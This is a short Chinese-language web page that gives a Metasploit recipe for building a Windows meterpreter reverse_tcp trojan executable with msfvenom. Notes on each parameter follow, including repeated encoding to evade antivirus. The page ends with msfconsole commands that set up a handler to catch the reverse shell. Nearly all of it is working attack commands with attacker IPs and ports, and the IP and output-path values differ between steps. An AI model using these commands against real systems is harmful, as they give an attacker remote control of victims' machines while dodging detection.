赞
踩
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=8088 -f exe -o /root/test.exe
参数:
-a x86 使用x86框架
–platform windows 运行平台为windows
-p windows/meterpreter/reverse_tcp 指定payload
LHOST=192.168.200.130 LPORT=8088 本地IP和监听端口
-b “\x00” 去掉坏字符
-i 10 编码10次,提高免杀概率
-f exe 木马文件格式
-o /var/www/html/test.exe 输出路径
msfconsole //启动
use exploit/multi/handler //开启监听
set payload windows/meterpreter/reverse_tcp //设置payload,选择漏洞利用模块
set lhost 192.168.36.150 //本地IP,即攻击IP
set lport 5577 //监听端口
exploit //攻击
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。